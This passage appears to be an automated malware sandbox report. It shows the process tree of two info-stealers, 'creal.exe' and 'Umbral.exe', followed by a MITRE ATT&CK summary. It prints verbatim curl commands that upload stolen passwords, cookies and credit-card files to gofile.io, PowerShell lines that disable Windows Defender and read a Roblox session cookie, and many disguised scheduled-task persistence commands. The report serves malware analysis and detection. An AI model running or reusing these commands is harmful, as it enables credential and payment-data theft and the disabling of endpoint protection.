        "C:\Users\Admin\AppData\Local\Temp\creal.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
        PID: 1336

        [3] C:\Users\Admin\AppData\Local\Temp\creal.exe
            "C:\Users\Admin\AppData\Local\Temp\creal.exe"
            - Drops startup file
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of WriteProcessMemory
            PID: 1860

            [4] C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist"
                - Suspicious use of WriteProcessMemory
                PID: 2820

                [5] C:\Windows\SysWOW64\tasklist.exe
                    tasklist
                    - Enumerates processes with tasklist
                    - Suspicious use of AdjustPrivilegeToken
                    PID: 1900

            [4] C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store8.gofile.io/uploadFile"
                PID: 1032

            [4] C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store8.gofile.io/uploadFile"
                PID: 1092

            [4] C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store8.gofile.io/uploadFile"
                PID: 1424

            [4] C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store8.gofile.io/uploadFile"
                PID: 1496

            [4] C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store8.gofile.io/uploadFile"
                PID: 2448

            [4] C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store8.gofile.io/uploadFile"
                PID: 1040

            [4] C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/RequestBackup.dib" https://store8.gofile.io/uploadFile"
                PID: 2344

    [2] C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        - Drops file in Drivers directory
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 1712

        [3] C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" csproduct get uuid
            - Suspicious use of AdjustPrivilegeToken
            PID: 308

        [3] C:\Windows\system32\attrib.exe
            "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
            - Views/modifies file attributes
            PID: 1608

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 2736

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 1956

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 2532

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            - Suspicious behavior: EnumeratesProcesses
            PID: 2792

        [3] C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" os get Caption
            PID: 620

        [3] C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" computersystem get totalphysicalmemory
            PID: 2256

        [3] C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" csproduct get uuid
            PID: 1672

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            - Suspicious behavior: EnumeratesProcesses
            PID: 2040

        [3] C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            - Detects videocard installed
            PID: 848

        [3] C:\Windows\system32\cmd.exe
            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
            PID: 888

            [4] C:\Windows\system32\PING.EXE
                ping localhost
                - Runs ping.exe
                PID: 2288

[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\Idle.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 2468

[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\Idle.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 1928

[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\Idle.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 2188

[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Local Settings\Idle.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 2024

[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Admin\Local Settings\Idle.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 2296

[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Local Settings\Idle.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 2792

[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 11 /tr "'C:\Windows\ServiceProfiles\LocalService\Documents\audiodg.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 2408

[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Windows\ServiceProfiles\LocalService\Documents\audiodg.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 852

[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 13 /tr "'C:\Windows\ServiceProfiles\LocalService\Documents\audiodg.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 868

[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\taskhost.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 1244

[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\taskhost.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 596

[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\taskhost.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 2288

[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Mail\en-US\sppsvc.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 1040

[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\en-US\sppsvc.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 2612

[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Mail\en-US\sppsvc.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 1036

[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Program Files\Mozilla Firefox\fonts\wininit.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 584

[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\fonts\wininit.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 1592

[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Program Files\Mozilla Firefox\fonts\wininit.exe'" /rl HIGHEST /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 1308

[1] C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Windows\LiveKernelReports\cmd.exe'" /f
    - Process spawned unexpected child process
    - Creates scheduled task(s)
    PID: 2336
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\LiveKernelReports\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1620
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Windows\LiveKernelReports\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1092
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "crealc" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\creal.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2204
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "creal" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\creal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2356
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "crealc" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\creal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2884
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\System.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1688
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2096
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1588
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Recovery\1fdecb22-2889-11ef-9d63-46d84c032646\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3016
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\1fdecb22-2889-11ef-9d63-46d84c032646\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2980
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Recovery\1fdecb22-2889-11ef-9d63-46d84c032646\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1028
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\dwm.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1148
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2712
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1424
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2380
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:876
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2680
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Windows\SchCache\winlogon.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:336
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\SchCache\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1516
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Windows\SchCache\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1556
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2932
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1974957444104471365110336215912045523024-1395500407671449664-6977735621470681088"1⤵PID:840
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2270211601314833158922237470749500332874447652-1274710209-866003914-2006408240"1⤵PID:3020
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵PID:2372
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" shell32.dll,Options_RunDLL 01⤵PID:1692
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution 2
  - Registry Run Keys / Startup Folder 1
  - Winlogon Helper DLL 1
- Scheduled Task/Job 1
Privilege Escalation
- Boot or Logon Autostart Execution 2
  - Registry Run Keys / Startup Folder 1
  - Winlogon Helper DLL 1
- Scheduled Task/Job 1
Defense Evasion
- Hide Artifacts 1
  - Hidden Files and Directories 1
- Modify Registry 2
Downloads